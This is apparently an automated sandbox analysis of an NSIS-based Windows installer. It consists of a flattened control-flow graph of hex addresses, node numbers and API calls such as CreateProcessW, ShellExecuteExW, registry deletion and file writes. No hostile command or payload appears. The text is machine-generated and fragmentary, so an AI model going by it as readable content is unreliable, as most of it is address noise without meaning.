405544 3640->3644 3645 405537 ShowWindow 3640->3645 3641->3632 3642 40557c SendMessageW SendMessageW 3641->3642 3642->3632 3646 4056f3 SendMessageW 3643->3646 3652 404216 SendMessageW 3644->3652 3645->3644 3646->3646 3647 405710 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3646->3647 3649 405735 SendMessageW 3647->3649 3649->3649 3650 40575e GlobalUnlock SetClipboardData CloseClipboard 3649->3650 3650->3632 3651->3612 3652->3641 3653->3613 3655 40422d SendMessageW 3654->3655 3658 4053a6 3655->3658 3656 4053cd 3657 40422d SendMessageW 3656->3657 3659 4053df CoUninitialize 3657->3659 3658->3656 3660 401389 2 API calls 3658->3660 3660->3658 3661 40176f 3662 402c37 17 API calls 3661->3662 3663 401776 3662->3663 3664 401796 3663->3664 3665 40179e 3663->3665 3721 40624c lstrcpynW 3664->3721 3722 40624c lstrcpynW 3665->3722 3668 40179c 3672 4064e0 5 API calls 3668->3672 3669 4017a9 3670 405b1d 3 API calls 3669->3670 3671 4017af lstrcatW 3670->3671 3671->3668 3677 4017bb 3672->3677 3673 40658f 2 API calls 3673->3677 3674 405d19 2 API calls 3674->3677 3676 4017cd CompareFileTime 3676->3677 3677->3673 3677->3674 3677->3676 3678 40188d 3677->3678 3681 40624c lstrcpynW 3677->3681 3688 40626e 17 API calls 3677->3688 3697 401864 3677->3697 3699 405d3e GetFileAttributesW CreateFileW 3677->3699 3723 4058ae 3677->3723 3679 4052b0 24 API calls 3678->3679 3682 401897 3679->3682 3680 4052b0 24 API calls 3687 401879 3680->3687 3681->3677 3700 4030fa 3682->3700 3685 4018be SetFileTime 3686 4018d0 CloseHandle 3685->3686 3686->3687 3689 4018e1 3686->3689 3688->3677 3690 4018e6 3689->3690 3691 4018f9 3689->3691 3692 40626e 17 API calls 3690->3692 3693 40626e 17 API calls 3691->3693 3695 4018ee lstrcatW 3692->3695 3696 401901 3693->3696 3695->3696 3698 4058ae MessageBoxIndirectW 3696->3698 3697->3680 3697->3687 3698->3687 3699->3677 3701 403113 3700->3701 3702 40313e 3701->3702 3737 4032f5 SetFilePointer 3701->3737 3727 4032df 3702->3727 3706 40315b GetTickCount 3717 40316e 
3706->3717 3707 40327f 3708 403283 3707->3708 3712 40329b 3707->3712 3710 4032df ReadFile 3708->3710 3709 4018aa 3709->3685 3709->3686 3710->3709 3711 4032df ReadFile 3711->3712 3712->3709 3712->3711 3714 405df0 WriteFile 3712->3714 3713 4032df ReadFile 3713->3717 3714->3712 3716 4031d4 GetTickCount 3716->3717 3717->3709 3717->3713 3717->3716 3718 4031fd MulDiv wsprintfW 3717->3718 3720 405df0 WriteFile 3717->3720 3730 4067a7 3717->3730 3719 4052b0 24 API calls 3718->3719 3719->3717 3720->3717 3721->3668 3722->3669 3724 4058c3 3723->3724 3725 40590f 3724->3725 3726 4058d7 MessageBoxIndirectW 3724->3726 3725->3677 3726->3725 3728 405dc1 ReadFile 3727->3728 3729 403149 3728->3729 3729->3706 3729->3707 3729->3709 3731 4067cc 3730->3731 3732 4067d4 3730->3732 3731->3717 3732->3731 3733 406864 GlobalAlloc 3732->3733 3734 40685b GlobalFree 3732->3734 3735 4068d2 GlobalFree 3732->3735 3736 4068db GlobalAlloc 3732->3736 3733->3731 3733->3732 3734->3733 3735->3736 3736->3731 3736->3732 3737->3702 4261 402570 4262 402c37 17 API calls 4261->4262 4263 402577 4262->4263 4266 405d3e GetFileAttributesW CreateFileW 4263->4266 4265 402583 4266->4265 3738 401b71 3739 401bc2 3738->3739 3740 401b7e 3738->3740 3741 401bc7 3739->3741 3742 401bec GlobalAlloc 3739->3742 3743 4022de 3740->3743 3748 401b95 3740->3748 3751 401c07 3741->3751 3759 40624c lstrcpynW 3741->3759 3744 40626e 17 API calls 3742->3744 3745 40626e 17 API calls 3743->3745 3744->3751 3747 4022eb 3745->3747 3753 4058ae MessageBoxIndirectW 3747->3753 3757 40624c lstrcpynW 3748->3757 3749 401bd9 GlobalFree 3749->3751 3752 401ba4 3758 40624c lstrcpynW 3752->3758 3753->3751 3755 401bb3 3760 40624c lstrcpynW 3755->3760 3757->3752 3758->3755 3759->3749 3760->3751 3761 4024f2 3762 402c77 17 API calls 3761->3762 3763 4024fc 3762->3763 3764 402c15 17 API calls 3763->3764 3765 402505 3764->3765 3766 402521 RegEnumKeyW 3765->3766 3767 40252d RegEnumValueW 3765->3767 3769 402885 3765->3769 3770 402549 RegCloseKey 3766->3770 3768 
402542 3767->3768 3767->3770 3768->3770 3770->3769 4267 401a72 4268 402c15 17 API calls 4267->4268 4269 401a78 4268->4269 4270 402c15 17 API calls 4269->4270 4271 401a20 4270->4271 3772 401573 3773 401583 ShowWindow 3772->3773 3774 40158c 3772->3774 3773->3774 3775 40159a ShowWindow 3774->3775 3776 402abf 3774->3776 3775->3776 4272 4042f5 lstrcpynW lstrlenW 4273 4014f5 SetForegroundWindow 4274 402abf 4273->4274 4282 401e77 4283 402c37 17 API calls 4282->4283 4284 401e7d 4283->4284 4285 402c37 17 API calls 4284->4285 4286 401e86 4285->4286 4287 402c37 17 API calls 4286->4287 4288 401e8f 4287->4288 4289 402c37 17 API calls 4288->4289 4290 401e98 4289->4290 4291 401423 24 API calls 4290->4291 4292 401e9f 4291->4292 4299 405874 ShellExecuteExW 4292->4299 4294 401ee1 4295 402885 4294->4295 4296 4066d7 5 API calls 4294->4296 4297 401efb CloseHandle 4296->4297 4297->4295 4299->4294 3799 40167b 3800 402c37 17 API calls 3799->3800 3801 401682 3800->3801 3802 402c37 17 API calls 3801->3802 3803 40168b 3802->3803 3804 402c37 17 API calls 3803->3804 3805 401694 MoveFileW 3804->3805 3806 4016a0 3805->3806 3807 4016a7 3805->3807 3809 401423 24 API calls 3806->3809 3808 40658f 2 API calls 3807->3808 3811 40224a 3807->3811 3810 4016b6 3808->3810 3809->3811 3810->3811 3812 406012 36 API calls 3810->3812 3812->3806 4078 4020fe 4079 402c37 17 API calls 4078->4079 4080 402105 4079->4080 4081 402c37 17 API calls 4080->4081 4082 40210f 4081->4082 4083 402c37 17 API calls 4082->4083 4084 402119 4083->4084 4085 402c37 17 API calls 4084->4085 4086 402123 4085->4086 4087 402c37 17 API calls 4086->4087 4088 40212d 4087->4088 4089 40216c CoCreateInstance 4088->4089 4090 402c37 17 API calls 4088->4090 4093 40218b 4089->4093 4090->4089 4091 401423 24 API calls 4092 40224a 4091->4092 4093->4091 4093->4092 4094 40247e 4095 402c77 17 API calls 4094->4095 4096 402488 4095->4096 4097 402c37 17 API calls 4096->4097 4098 402491 4097->4098 4099 40249c RegQueryValueExW 4098->4099 4103 402885 4098->4103 
4100 4024c2 RegCloseKey 4099->4100 4101 4024bc 4099->4101 4100->4103 4101->4100 4105 406193 wsprintfW 4101->4105 4105->4100 4300 40437e 4301 404396 4300->4301 4308 4044b0 4300->4308 4305 4041e1 18 API calls 4301->4305 4302 40451a 4303 4045e4 4302->4303 4304 404524 GetDlgItem 4302->4304 4310 404248 8 API calls 4303->4310 4306 4045a5 4304->4306 4307 40453e 4304->4307 4309 4043fd 4305->4309 4306->4303 4314 4045b7 4306->4314 4307->4306 4313 404564 SendMessageW LoadCursorW SetCursor 4307->4313 4308->4302 4308->4303 4311 4044eb GetDlgItem SendMessageW 4308->4311 4312 4041e1 18 API calls 4309->4312 4325 4045df 4310->4325 4333 404203 KiUserCallbackDispatcher 4311->4333 4317 40440a CheckDlgButton 4312->4317 4337 40462d 4313->4337 4319 4045cd 4314->4319 4320 4045bd SendMessageW 4314->4320 4316 404515 4334 404609 4316->4334 4331 404203 KiUserCallbackDispatcher 4317->4331 4324 4045d3 SendMessageW 4319->4324 4319->4325 4320->4319 4324->4325 4326 404428 GetDlgItem 4332 404216 SendMessageW 4326->4332 4328 40443e SendMessageW 4329 404464 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4328->4329 4330 40445b GetSysColor 4328->4330 4329->4325 4330->4329 4331->4326 4332->4328 4333->4316 4335 404617 4334->4335 4336 40461c SendMessageW 4334->4336 4335->4336 4336->4302 4340 405874 ShellExecuteExW 4337->4340 4339 404593 LoadCursorW SetCursor 4339->4306 4340->4339 4341 4019ff 4342 402c37 17 API calls 4341->4342 4343 401a06 4342->4343 4344 402c37 17 API calls 4343->4344 4345 401a0f 4344->4345 4346 401a16 lstrcmpiW 4345->4346 4347 401a28 lstrcmpW 4345->4347 4348 401a1c 4346->4348 4347->4348 3162 401f00 3177 402c37 3162->3177 3169 402885 3172 401f2b 3173 401f30 3172->3173 3174 401f3b 3172->3174 3202 406193 wsprintfW 3173->3202 3176 401f39 CloseHandle 3174->3176 3176->3169 3178 402c43 3177->3178 3203 40626e 3178->3203 3181 401f06 3183 4052b0 3181->3183 3184 4052cb 3183->3184 3193 401f10 3183->3193 3185 4052e7 lstrlenW 3184->3185 3186 40626e 17 API calls 3184->3186 3187 405310 
3185->3187 3188 4052f5 lstrlenW 3185->3188 3186->3185 3190 405323 3187->3190 3191 405316 SetWindowTextW 3187->3191 3189 405307 lstrcatW 3188->3189 3188->3193 3189->3187 3192 405329 SendMessageW SendMessageW SendMessageW 3190->3192 3190->3193 3191->3190 3192->3193 3194 405831 CreateProcessW 3193->3194 3195 401f16 3194->3195 3196 405864 CloseHandle 3194->3196 3195->3169 3195->3176 3197 4066d7 WaitForSingleObject 3195->3197 3196->3195 3198 4066f1 3197->3198 3199 406703 GetExitCodeProcess 3198->3199 3245 406662 3198->3245 3199->3172 3202->3176 3207 40627b 3203->3207 3204 4064c6 3205 402c64 3204->3205 3236 40624c lstrcpynW 3204->3236 3205->3181 3220 4064e0 3205->3220 3207->3204 3208 406494 lstrlenW 3207->3208 3209 40626e 10 API calls 3207->3209 3213 4063a9 GetSystemDirectoryW 3207->3213 3214 4063bc GetWindowsDirectoryW 3207->3214 3215 4064e0 5 API calls 3207->3215 3216 40626e 10 API calls 3207->3216 3217 406437 lstrcatW 3207->3217 3218 4063f0 SHGetSpecialFolderLocation 3207->3218 3229 40611a 3207->3229 3234 406193 wsprintfW 3207->3234 3235 40624c lstrcpynW 3207->3235 3208->3207 3209->3208 3213->3207 3214->3207 3215->3207 3216->3207 3217->3207 3218->3207 3219 406408 SHGetPathFromIDListW CoTaskMemFree 3218->3219 3219->3207 3227 4064ed 3220->3227 3221 406563 3222 406568 CharPrevW 3221->3222 3225 406589 3221->3225 3222->3221 3223 406556 CharNextW 3223->3221 3223->3227 3225->3181 3226 406542 CharNextW 3226->3227 3227->3221 3227->3223 3227->3226 3228 406551 CharNextW 3227->3228 3241 405b4a 3227->3241 3228->3223 3237 4060b9 3229->3237 3232 40617e 3232->3207 3233 40614e RegQueryValueExW RegCloseKey 3233->3232 3234->3207 3235->3207 3236->3205 3238 4060c8 3237->3238 3239 4060d1 RegOpenKeyExW 3238->3239 3240 4060cc 3238->3240 3239->3240 3240->3232 3240->3233 3242 405b50 3241->3242 3243 405b66 3242->3243 3244 405b57 CharNextW 3242->3244 3243->3227 3244->3242 3246 40667f PeekMessageW 3245->3246 3247 406675 DispatchMessageW 3246->3247 3248 40668f WaitForSingleObject 3246->3248 
3247->3246 3248->3198 4349 401000 4350 401037 BeginPaint GetClientRect 4349->4350 4351 40100c DefWindowProcW 4349->4351 4353 4010f3 4350->4353 4354 401179 4351->4354 4355 401073 CreateBrushIndirect FillRect DeleteObject 4353->4355 4356 4010fc 4353->4356 4355->4353 4357 401102 CreateFontIndirectW 4356->4357 4358 401167 EndPaint 4356->4358 4357->4358 4359 401112 6 API calls 4357->4359 4358->4354 4359->4358 4360 401503 4361 40150b 4360->4361 4363 40151e 4360->4363 4362 402c15 17 API calls 4361->4362 4362->4363 3448 402306 3449 40230e 3448->3449 3452 402314 3448->3452 3450 402c37 17 API calls 3449->3450 3450->3452 3451 402322 3454 402330 3451->3454 3455 402c37 17 API calls 3451->3455 3452->3451 3453 402c37 17 API calls 3452->3453 3453->3451 3456 402c37 17 API calls 3454->3456 3455->3454 3457 402339 WritePrivateProfileStringW 3456->3457 4364 404a06 4365 404a32 4364->4365 4366 404a16 4364->4366 4368 404a65 4365->4368 4369 404a38 SHGetPathFromIDListW 4365->4369 4375 405892 GetDlgItemTextW 4366->4375 4371 404a4f SendMessageW 4369->4371 4372 404a48 4369->4372 4370 404a23 SendMessageW 4370->4365 4371->4368 4373 40140b 2 API calls 4372->4373 4373->4371 4375->4370 4376 401f86 4377 402c37 17 API calls 4376->4377 4378 401f8d 4377->4378 4379 406626 5 API calls 4378->4379 4380 401f9c 4379->4380 4381 401fb8 GlobalAlloc 4380->4381 4382 402020 4380->4382 4381->4382 4383 401fcc 4381->4383 4384 406626 5 API calls 4383->4384 4385 401fd3 4384->4385 4386 406626 5 API calls 4385->4386 4387 401fdd 4386->4387 4387->4382 4391 406193 wsprintfW 4387->4391 4389 402012 4392 406193 wsprintfW 4389->4392 4391->4389 4392->4382 3465 403d08 3466 403d20 3465->3466 3467 403e5b 3465->3467 3466->3467 3469 403d2c 3466->3469 3468 403e6c GetDlgItem GetDlgItem 3467->3468 3473 403eac 3467->3473 3472 4041e1 18 API calls 3468->3472 3470 403d37 SetWindowPos 3469->3470 3471 403d4a 3469->3471 3470->3471 3475 403d67 3471->3475 3476 403d4f ShowWindow 3471->3476 3477 403e96 SetClassLongW 3472->3477 3474 403f06 
3473->3474 3482 401389 2 API calls 3473->3482 3483 403e56 3474->3483 3536 40422d 3474->3536 3479 403d89 3475->3479 3480 403d6f DestroyWindow 3475->3480 3476->3475 3481 40140b 2 API calls 3477->3481 3485 403d8e SetWindowLongW 3479->3485 3486 403d9f 3479->3486 3484 40416a 3480->3484 3481->3473 3487 403ede 3482->3487 3484->3483 3493 40419b ShowWindow 3484->3493 3485->3483 3490 403e48 3486->3490 3491 403dab GetDlgItem 3486->3491 3487->3474 3492 403ee2 SendMessageW 3487->3492 3488 40140b 2 API calls 3505 403f18 3488->3505 3489 40416c DestroyWindow EndDialog 3489->3484 3558 404248 3490->3558 3494 403ddb 3491->3494 3495 403dbe SendMessageW IsWindowEnabled 3491->3495 3492->3483 3493->3483 3498 403de8 3494->3498 3499 403dfb 3494->3499 3500 403e2f SendMessageW 3494->3500 3509 403de0 3494->3509 3495->3483 3495->3494 3497 40626e 17 API calls 3497->3505 3498->3500 3498->3509 3502 403e03 3499->3502 3503 403e18 3499->3503 3500->3490 3552 40140b 3502->3552 3507 40140b 2 API calls 3503->3507 3504 403e16 3504->3490 3505->3483 3505->3488 3505->3489 3505->3497 3508 4041e1 18 API calls 3505->3508 3527 4040ac DestroyWindow 3505->3527 3539 4041e1 3505->3539 3510 403e1f 3507->3510 3508->3505 3555 4041ba 3509->3555 3510->3490 3510->3509 3512 403f93 GetDlgItem 3513 403fb0 ShowWindow KiUserCallbackDispatcher 3512->3513 3514 403fa8 3512->3514 3542 404203 KiUserCallbackDispatcher 3513->3542 3514->3513 3516 403fda EnableWindow 3521 403fee 3516->3521 3517 403ff3 GetSystemMenu EnableMenuItem SendMessageW 3518 404023 SendMessageW 3517->3518 3517->3521 3518->3521 3521->3517 3543 404216 SendMessageW 3521->3543 3544 403ce9 3521->3544 3547 40624c lstrcpynW 3521->3547 3523 404052 lstrlenW 3524 40626e 17 API calls 3523->3524 3525 404068 SetWindowTextW 3524->3525 3548 401389 3525->3548 3527->3484 3528 4040c6 CreateDialogParamW 3527->3528 3528->3484 3529 4040f9 3528->3529 3530 4041e1 18 API calls 3529->3530 3531 404104 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3530->3531 3532 401389 2 API calls 
3531->3532 3533 40414a 3532->3533 3533->3483 3534 404152 ShowWindow 3533->3534 3535 40422d SendMessageW 3534->3535 3535->3484 3537 404245 3536->3537 3538 404236 SendMessageW 3536->3538 3537->3505 3538->3537 3540 40626e 17 API calls 3539->3540 3541 4041ec SetDlgItemTextW 3540->3541 3541->3512 3542->3516 3543->3521 3545 40626e 17 API calls 3544->3545 3546 403cf7 SetWindowTextW 3545->3546 3546->3521 3547->3523 3550 401390 3548->3550 3549 4013fe 3549->3505 3550->3549 3551 4013cb MulDiv SendMessageW 3550->3551 3551->3550 3553 401389 2 API calls 3552->3553 3554 401420 3553->3554 3554->3509 3556 4041c1 3555->3556 3557 4041c7 SendMessageW 3555->3557 3556->3557 3557->3504 3559 404260 GetWindowLongW 3558->3559 3569 4042e9 3558->3569 3560 404271 3559->3560 3559->3569 3561 404280 GetSysColor 3560->3561 3562 404283 3560->3562 3561->3562 3563 404293 SetBkMode 3562->3563 3564 404289 SetTextColor 3562->3564 3565 4042b1 3563->3565 3566 4042ab GetSysColor 3563->3566 3564->3563 3567 4042c2 3565->3567 3568 4042b8 SetBkColor 3565->3568 3566->3565 3567->3569 3570 4042d5 DeleteObject 3567->3570 3571 4042dc CreateBrushIndirect 3567->3571 3568->3567 3569->3483 3570->3571 3571->3569 3572 402388 3573 402390 3572->3573 3574 4023bb 3572->3574 3588 402c77 3573->3588 3576 402c37 17 API calls 3574->3576 3577 4023c2 3576->3577 3584 402cf5 3577->3584 3580 4023a1 3582 402c37 17 API calls 3580->3582 3581 4023cf 3583 4023a8 RegDeleteValueW RegCloseKey 3582->3583 3583->3581 3585 402d0b 3584->3585 3586 402d21 3585->3586 3593 402d2a 3585->3593 3586->3581 3589 402c37 17 API calls 3588->3589 3590 402c8e 3589->3590 3591 4060b9 RegOpenKeyExW 3590->3591 3592 402397 3591->3592 3592->3580 3592->3581 3594 4060b9 RegOpenKeyExW 3593->3594 3595 402d58 3594->3595 3596 402dd0 3595->3596 3597 402d5c 3595->3597 3596->3586 3598 402d7e RegEnumKeyW 3597->3598 3599 402d95 RegCloseKey 3597->3599 3600 402db6 RegCloseKey 3597->3600 3602 402d2a 6 API calls 3597->3602 3598->3597 3598->3599 3601 406626 5 API calls 3599->3601 
3600->3596 3603 402da5 3601->3603 3602->3597 3604 402dc4 RegDeleteKeyW 3603->3604 3605 402da9 3603->3605 3604->3596 3605->3596 4400 40190c 4401 401943 4400->4401 4402 402c37 17 API calls 4401->4402 4403 401948 4402->4403 4404 40595a 67 API calls 4403->4404 4405 401951 4404->4405 4413 401d0e 4414 402c15 17 API calls 4413->4414 4415 401d15 4414->4415 4416 402c15 17 API calls 4415->4416 4417 401d21 GetDlgItem 4416->4417 4418 40258c 4417->4418 4419 40190f 4420 402c37 17 API calls 4419->4420 4421 401916 4420->4421 4422 4058ae MessageBoxIndirectW 4421->4422 4423 40191f 4422->4423 4424 401491 4425 4052b0 24 API calls 4424->4425 4426 401498 4425->4426 4427 402592 4428 4025c1 4427->4428 4429 4025a6 4427->4429 4431 4025f5 4428->4431 4432 4025c6 4428->4432 4430 402c15 17 API calls 4429->4430 4440 4025ad 4430->4440 4434 402c37 17 API calls 4431->4434 4433 402c37 17 API calls 4432->4433 4435 4025cd WideCharToMultiByte lstrlenA 4433->4435 4436 4025fc lstrlenW 4434->4436 4435->4440 4436->4440 4437 40263f 4438 402629 4438->4437 4439 405df0 WriteFile 4438->4439 4439->4437 4440->4437 4440->4438 4441 405e1f 5 API calls 4440->4441 4441->4438 4449 403918 4450 403923 4449->4450 4451 403927 4450->4451 4452 40392a GlobalAlloc 4450->4452 4452->4451 3777 401c19 3778 402c15 17 API calls 3777->3778 3779 401c20 3778->3779 3780 402c15 17 API calls 3779->3780 3781 401c2d 3780->3781 3782 401c42 3781->3782 3783 402c37 17 API calls 3781->3783 3784 401c52 3782->3784 3785 402c37 17 API calls 3782->3785 3783->3782 3786 401ca9 3784->3786 3787 401c5d 3784->3787 3785->3784 3789 402c37 17 API calls 3786->3789 3788 402c15 17 API calls 3787->3788 3790 401c62 3788->3790 3791 401cae 3789->3791 3792 402c15 17 API calls 3790->3792 3793 402c37 17 API calls 3791->3793 3794 401c6e 3792->3794 3795 401cb7 FindWindowExW 3793->3795 3796 401c99 SendMessageW 3794->3796 3797 401c7b SendMessageTimeoutW 3794->3797 3798 401cd9 3795->3798 3796->3798 3797->3798 4453 402a9a SendMessageW 4454 402ab4 InvalidateRect 4453->4454 
4455 402abf 4453->4455 4454->4455 4456 40281b 4457 402821 4456->4457 4458 402829 FindClose 4457->4458 4459 402abf 4457->4459 4458->4459 4460 40149e 4461 4014ac PostQuitMessage 4460->4461 4462 4022f1 4460->4462 4461->4462 4463 4029a2 4464 402c15 17 API calls 4463->4464 4465 4029a8 4464->4465 4466 4029e8 4465->4466 4467 4029cf 4465->4467 4475 402885 4465->4475 4468 402a02 4466->4468 4469 4029f2 4466->4469 4471 4029d4 4467->4471 4472 4029e5 4467->4472 4470 40626e 17 API calls 4468->4470 4473 402c15 17 API calls 4469->4473 4470->4472 4477 40624c lstrcpynW 4471->4477 4472->4475 4478 406193 wsprintfW 4472->4478 4473->4472 4477->4475 4478->4475 3444 4015a3 3445 402c37 17 API calls 3444->3445 3446 4015aa SetFileAttributesW 3445->3446 3447 4015bc 3446->3447 4486 405224 4487 405234 4486->4487 4488 405248 4486->4488 4489 40523a 4487->4489 4498 405291 4487->4498 4490 405250 IsWindowVisible 4488->4490 4494 405267 4488->4494 4492 40422d SendMessageW 4489->4492 4493 40525d 4490->4493 4490->4498 4491 405296 CallWindowProcW 4495 405244 4491->4495 4492->4495 4499 404b7a SendMessageW 4493->4499 4494->4491 4504 404bfa 4494->4504 4498->4491 4500 404bd9 SendMessageW 4499->4500 4501 404b9d GetMessagePos ScreenToClient SendMessageW 4499->4501 4502 404bd1 4500->4502 4501->4502 4503 404bd6 4501->4503 4502->4494 4503->4500 4513 40624c lstrcpynW 4504->4513 4506 404c0d 4514 406193 wsprintfW 4506->4514 4508 404c17 4509 40140b 2 API calls 4508->4509 4510 404c20 4509->4510 4515 40624c lstrcpynW 4510->4515 4512 404c27 4512->4498 4513->4506 4514->4508 4515->4512 4516 4028a7 4517 402c37 17 API calls 4516->4517 4518 4028b5 4517->4518 4519 4028cb 4518->4519 4520 402c37 17 API calls 4518->4520 4521 405d19 2 API calls 4519->4521 4520->4519 4522 4028d1 4521->4522 4544 405d3e GetFileAttributesW CreateFileW 4522->4544 4524 4028de 4525 402981 4524->4525 4526 4028ea GlobalAlloc 4524->4526 4529 402989 DeleteFileW 4525->4529 4530 40299c 4525->4530 4527 402903 4526->4527 4528 402978 CloseHandle 4526->4528 4545 
4032f5 SetFilePointer 4527->4545 4528->4525 4529->4530 4532 402909 4533 4032df ReadFile 4532->4533 4534 402912 GlobalAlloc 4533->4534 4535 402922 4534->4535 4536 402956 4534->4536 4537 4030fa 35 API calls 4535->4537 4538 405df0 WriteFile 4536->4538 4543 40292f 4537->4543 4539 402962 GlobalFree 4538->4539 4540 4030fa 35 API calls 4539->4540 4541 402975 4540->4541 4541->4528 4542 40294d GlobalFree 4542->4536 4543->4542 4544->4524 4545->4532 4546 404c2c GetDlgItem GetDlgItem 4547 404c7e 7 API calls 4546->4547 4556 404e97 4546->4556 4548 404d21 DeleteObject 4547->4548 4549 404d14 SendMessageW 4547->4549 4550 404d2a 4548->4550 4549->4548 4551 404d61 4550->4551 4555 40626e 17 API calls 4550->4555 4553 4041e1 18 API calls 4551->4553 4552 404f7b 4554 405027 4552->4554 4558 404e8a 4552->4558 4564 404fd4 SendMessageW 4552->4564 4557 404d75 4553->4557 4559 405031 SendMessageW 4554->4559 4560 405039 4554->4560 4561 404d43 SendMessageW SendMessageW 4555->4561 4556->4552 4562 404b7a 5 API calls 4556->4562 4580 404f08 4556->4580 4563 4041e1 18 API calls 4557->4563 4565 404248 8 API calls 4558->4565 4559->4560 4567 405052 4560->4567 4568 40504b ImageList_Destroy 4560->4568 4575 405062 4560->4575 4561->4550 4562->4580 4581 404d83 4563->4581 4564->4558 4570 404fe9 SendMessageW 4564->4570 4571 40521d 4565->4571 4566 404f6d SendMessageW 4566->4552 4572 40505b GlobalFree 4567->4572 4567->4575 4568->4567 4569 4051d1 4569->4558 4576 4051e3 ShowWindow GetDlgItem ShowWindow 4569->4576 4574 404ffc 4570->4574 4572->4575 4573 404e58 GetWindowLongW SetWindowLongW 4577 404e71 4573->4577 4585 40500d SendMessageW 4574->4585 4575->4569 4589 404bfa 4 API calls 4575->4589 4593 40509d 4575->4593 4576->4558 4578 404e77 ShowWindow 4577->4578 4579 404e8f 4577->4579 4597 404216 SendMessageW 4578->4597 4598 404216 SendMessageW 4579->4598 4580->4552 4580->4566 4581->4573 4584 404dd3 SendMessageW 4581->4584 4586 404e52 4581->4586 4587 404e20 SendMessageW 4581->4587 4588 404e0f SendMessageW 4581->4588 
4584->4581 4585->4554 4586->4573 4586->4577 4587->4581 4588->4581 4589->4593 4590 4051a7 InvalidateRect 4590->4569 4591 4051bd 4590->4591 4599 404b35 4591->4599 4592 4050cb SendMessageW 4596 4050e1 4592->4596 4593->4592 4593->4596 4595 405155 SendMessageW SendMessageW 4595->4596 4596->4590 4596->4595 4597->4558 4598->4556 4602 404a6c 4599->4602 4601 404b4a 4601->4569 4603 404a85 4602->4603 4604 40626e 17 API calls 4603->4604 4605 404ae9 4604->4605 4606 40626e 17 API calls 4605->4606 4607 404af4 4606->4607 4608 40626e 17 API calls 4607->4608 4609 404b0a lstrlenW wsprintfW SetDlgItemTextW 4608->4609 4609->4601 4610 40202c 4611 40203e 4610->4611 4621 4020f0 4610->4621 4612 402c37 17 API calls 4611->4612 4613 402045 4612->4613 4615 402c37 17 API calls 4613->4615 4614 401423 24 API calls 4619 40224a 4614->4619 4616 40204e 4615->4616 4617 402064 LoadLibraryExW 4616->4617 4618 402056 GetModuleHandleW 4616->4618 4620 402075 4617->4620 4617->4621 4618->4617 4618->4620 4630 406695 WideCharToMultiByte 4620->4630 4621->4614 4624 402086 4627 401423 24 API calls 4624->4627 4628 402096 4624->4628 4625 4020bf 4626 4052b0 24 API calls 4625->4626 4626->4628 4627->4628 4628->4619 4629 4020e2 FreeLibrary 4628->4629 4629->4619 4631 402080 4630->4631 4632 4066bf GetProcAddress 4630->4632 4631->4624 4631->4625 4632->4631 4633 40432f lstrlenW 4634 404350 WideCharToMultiByte 4633->4634 4635 40434e 4633->4635 4635->4634 4636 402a2f 4637 402c15 17 API calls 4636->4637 4638 402a35 4637->4638 4639 402a6c 4638->4639 4640 402885 4638->4640 4642 402a47 4638->4642 4639->4640 4641 40626e 17 API calls 4639->4641 4641->4640 4642->4640 4644 406193 wsprintfW 4642->4644 4644->4640 4645 401a30 4646 402c37 17 API calls 4645->4646 4647 401a39 ExpandEnvironmentStringsW 4646->4647 4648 401a4d 4647->4648 4650 401a60 4647->4650 4649 401a52 lstrcmpW 4648->4649 4648->4650 4649->4650 4651 4046b0 4652 4046dc 4651->4652 4653 4046ed 4651->4653 4712 405892 GetDlgItemTextW 4652->4712 4655 4046f9 GetDlgItem 4653->4655 
4661 404758 4653->4661 4657 40470d 4655->4657 4656 4046e7 4659 4064e0 5 API calls 4656->4659 4663 404721 SetWindowTextW 4657->4663 4668 405bc8 4 API calls 4657->4668 4658 40483c 4660 4049eb 4658->4660 4714 405892 GetDlgItemTextW 4658->4714 4659->4653 4667 404248 8 API calls 4660->4667 4661->4658 4661->4660 4664 40626e 17 API calls 4661->4664 4666 4041e1 18 API calls 4663->4666 4670 4047cc SHBrowseForFolderW 4664->4670 4665 40486c 4671 405c25 18 API calls 4665->4671 4672 40473d 4666->4672 4673 4049ff 4667->4673 4669 404717 4668->4669 4669->4663 4677 405b1d 3 API calls 4669->4677 4670->4658 4674 4047e4 CoTaskMemFree 4670->4674 4675 404872 4671->4675 4676 4041e1 18 API calls 4672->4676 4678 405b1d 3 API calls 4674->4678 4715 40624c lstrcpynW 4675->4715 4679 40474b 4676->4679 4677->4663 4680 4047f1 4678->4680 4713 404216 SendMessageW 4679->4713 4683 404828 SetDlgItemTextW 4680->4683 4688 40626e 17 API calls 4680->4688 4683->4658 4684 404751 4686 406626 5 API calls 4684->4686 4685 404889 4687 406626 5 API calls 4685->4687 4686->4661 4694 404890 4687->4694 4689 404810 lstrcmpiW 4688->4689 4689->4683 4692 404821 lstrcatW 4689->4692 4690 4048d1 4716 40624c lstrcpynW 4690->4716 4692->4683 4693 4048d8 4695 405bc8 4 API calls 4693->4695 4694->4690 4698 405b69 2 API calls 4694->4698 4700 404929 4694->4700 4696 4048de GetDiskFreeSpaceW 4695->4696 4699 404902 MulDiv 4696->4699 4696->4700 4698->4694 4699->4700 4701 40499a 4700->4701 4703 404b35 20 API calls 4700->4703 4702 4049bd 4701->4702 4704 40140b 2 API calls 4701->4704 4717 404203 KiUserCallbackDispatcher 4702->4717 4705 404987 4703->4705 4704->4702 4707 40499c SetDlgItemTextW 4705->4707 4708 40498c 4705->4708 4707->4701 4710 404a6c 20 API calls 4708->4710 4709 4049d9 4709->4660 4711 404609 SendMessageW 4709->4711 4710->4701 4711->4660 4712->4656 4713->4684 4714->4665 4715->4685 4716->4693 4717->4709 4723 401db3 GetDC 4724 402c15 17 API calls 4723->4724 4725 401dc5 GetDeviceCaps MulDiv ReleaseDC 4724->4725 4726 402c15 17 

                                            Control-flow Graph

                                            [Figure: control-flow graph of the function starting at 0040333D; legend: Executed / Not Executed]
                                            APIs
                                            • SetErrorMode.KERNELBASE ref: 00403360
                                            • GetVersion.KERNEL32 ref: 00403366
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                            • OleInitialize.OLE32(00000000), ref: 004033DD
                                            • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                            • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
